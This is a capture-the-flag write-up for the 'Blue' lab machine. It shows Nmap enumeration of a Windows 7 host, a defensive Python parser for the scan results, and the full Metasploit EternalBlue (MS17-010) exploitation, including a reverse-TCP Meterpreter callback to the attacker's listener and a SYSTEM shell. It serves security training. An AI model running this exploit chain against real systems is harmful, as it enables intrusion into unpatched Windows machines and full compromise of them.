Blue is a very simple beginner box that tasks the user with enumerating the target with Nmap and using a public exploit to compromise it.

Step 1: Enumerate with NMAP

Our first step in compromising the victim machine is to enumerate it with Nmap (version detection and default scripts via -A, with host discovery skipped via -Pn).

➜  blue nmap -A -v 10.129.24.173 -Pn           
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-01-22 14:47 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:47
Completed Parallel DNS resolution of 1 host. at 14:47, 0.00s elapsed
Initiating Connect Scan at 14:47
Scanning 10.129.24.173 [1000 ports]
Connect Scan Timing: About 15.00% done; ETC: 14:50 (0:02:56 remaining)
Discovered open port 49154/tcp on 10.129.24.173
Increasing send delay for 10.129.24.173 from 0 to 5 due to 151 out of 501 dropped probes since last increase.
Discovered open port 49152/tcp on 10.129.24.173
Increasing send delay for 10.129.24.173 from 5 to 10 due to 11 out of 31 dropped probes since last increase.
Discovered open port 445/tcp on 10.129.24.173
Increasing send delay for 10.129.24.173 from 10 to 20 due to 11 out of 15 dropped probes since last increase.
Discovered open port 135/tcp on 10.129.24.173
Discovered open port 139/tcp on 10.129.24.173
Increasing send delay for 10.129.24.173 from 20 to 40 due to 11 out of 12 dropped probes since last increase.
Discovered open port 49153/tcp on 10.129.24.173
Discovered open port 49157/tcp on 10.129.24.173
Discovered open port 49155/tcp on 10.129.24.173
Discovered open port 49156/tcp on 10.129.24.173
Completed Connect Scan at 14:48, 61.50s elapsed (1000 total ports)
Initiating Service scan at 14:48
Scanning 9 services on 10.129.24.173
Service scan Timing: About 44.44% done; ETC: 14:50 (0:01:08 remaining)
Completed Service scan at 14:49, 59.15s elapsed (9 services on 1 host)
NSE: Script scanning 10.129.24.173.
Initiating NSE at 14:49
Completed NSE at 14:49, 9.22s elapsed
Initiating NSE at 14:49
Completed NSE at 14:49, 0.01s elapsed
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Nmap scan report for 10.129.24.173
Host is up (0.024s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT      STATE SERVICE     VERSION
135/tcp   open  msrpc       Microsoft Windows RPC
139/tcp   open  netbios-ssn Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc       Microsoft Windows RPC
49153/tcp open  msrpc       Microsoft Windows RPC
49154/tcp open  msrpc       Microsoft Windows RPC
49155/tcp open  msrpc       Microsoft Windows RPC
49156/tcp open  msrpc       Microsoft Windows RPC
49157/tcp open  msrpc       Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-01-22T19:49:09
|_  start_date: 2023-01-22T19:16:18
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-01-22T19:49:10+00:00
|_clock-skew: mean: 3s, deviation: 2s, median: 1s

NSE: Script Post-scanning.
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.20 seconds

Nmap has fingerprinted the host (HARIS-PC) as Windows 7 Professional 7601 Service Pack 1 and shows SMB exposed on 445/tcp with message signing not required. We should continue our investigation by checking whether there is a public exploit for this version of Windows.
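As an added example (my own script, not part of the original writeup), this Python snippet parses the port table and the SMB script results from the Nmap report above and turns them into the findings a defender would act on. The input is a constructed sample copied from the scan output, and the wording of the findings is my own.

```python
import re
# Constructed sample: the relevant lines of the Nmap report above, trimmed to the
# port table and the SMB host-script results that the parser needs.
NMAP_REPORT = """\
PORT      STATE SERVICE     VERSION
139/tcp   open  netbios-ssn Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^[a-z0-9-]+:$")  # NSE script header, e.g. smb-os-discovery:

def parse_report(text):
    # Returns open ports, the OS reported over SMB, and the SMBv1/SMBv2 signing posture.
    info = {"open_ports": {}, "os": None, "smb1_signing": None, "smb2_signing": None}
    section = None
    for raw in text.splitlines():
        m = PORT_RE.match(raw.strip())
        if m:
            info["open_ports"][int(m.group(1))] = (m.group(2), m.group(3).strip())
            continue
        body = raw.strip().lstrip("|_ ")  # drop the NSE tree prefix from script output lines
        if SCRIPT_RE.match(body):
            section = body[:-1]
        elif section == "smb-security-mode" and body.startswith("message_signing:"):
            info["smb1_signing"] = body.split(":", 1)[1].strip()
        elif section == "smb2-security-mode" and "signing" in body.lower():
            info["smb2_signing"] = body
        elif section == "smb-os-discovery" and body.startswith("OS:"):
            info["os"] = body.split(":", 1)[1].strip()
    return info

def assess(info):
    # Turn the parsed facts into findings; nothing is flagged unless SMB is reachable.
    findings = []
    if not any(p in info["open_ports"] for p in (139, 445)):
        return findings
    if (info["smb1_signing"] or "").startswith("disabled"):
        findings.append("SMBv1 reachable with message signing disabled (tampering/relay risk)")
    if "not required" in (info["smb2_signing"] or ""):
        findings.append("SMBv2 message signing enabled but not required")
    if (info["os"] or "").startswith("Windows 7"):
        findings.append("Windows 7 exposing SMB: confirm the MS17-010 update is applied and SMBv1 is disabled")
    return findings
```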

Step 2: Exploiting the Target

After searching for Windows 7 Professional 7601 Service Pack 1 exploits, we quickly find a Metasploit module that may be capable of exploiting the target: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/. The module exploits a buffer overflow in the SMBv1 service (MS17-010) that can lead to the execution of attacker-defined arbitrary commands. Let’s try it out.

➜  blue msfconsole  

       =[ metasploit v6.2.37-dev-                         ]
+ -- --=[ 2277 exploits - 1194 auxiliary - 408 post       ]
+ -- --=[ 948 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Display the Framework log using the 
log command, learn more with help log
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/windows/smb/ms17_010_
use exploit/windows/smb/ms17_010_eternalblue  use exploit/windows/smb/ms17_010_psexec       
msf6 > use exploit/windows/smb/ms17_010_eternalblue 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.173    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.129.24.173
rhosts => 10.129.24.173
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.86
lhost => 10.10.14.86
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.129.24.173    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.86      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.14.86:4444 
[*] 10.129.24.173:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.24.173:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.129.24.173:445     - Scanned 1 of 1 hosts (100% complete)
[+] 10.129.24.173:445 - The target is vulnerable.
[*] 10.129.24.173:445 - Connecting to target for exploitation.
[+] 10.129.24.173:445 - Connection established for exploitation.
[+] 10.129.24.173:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.129.24.173:445 - CORE raw buffer dump (42 bytes)
[*] 10.129.24.173:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.129.24.173:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.129.24.173:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.129.24.173:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.129.24.173:445 - Trying exploit with 12 Groom Allocations.
[*] 10.129.24.173:445 - Sending all but last fragment of exploit packet
[*] 10.129.24.173:445 - Starting non-paged pool grooming
[+] 10.129.24.173:445 - Sending SMBv2 buffers
[+] 10.129.24.173:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.129.24.173:445 - Sending final SMBv2 buffers.
[*] 10.129.24.173:445 - Sending last fragment of exploit packet!
[*] 10.129.24.173:445 - Receiving response from exploit packet
[+] 10.129.24.173:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.129.24.173:445 - Sending egg to corrupted connection.
[*] 10.129.24.173:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.129.24.173
[+] 10.129.24.173:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.24.173:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.24.173:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (10.10.14.86:4444 -> 10.129.24.173:49158) at 2023-01-22 15:08:50 -0500

We only need to supply the remote host IP (RHOSTS) and our own listening IP and port (LHOST/LPORT) to run the exploit. After running it we are quickly presented with a Meterpreter session. SUCCESS!

We can now drop into a shell and run the whoami command to confirm that we have elevated (SYSTEM-level) privileges on the victim machine.

meterpreter > shell
Process 2920 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

The last step is to navigate to each user’s desktop and collect the flags. Piece of cake.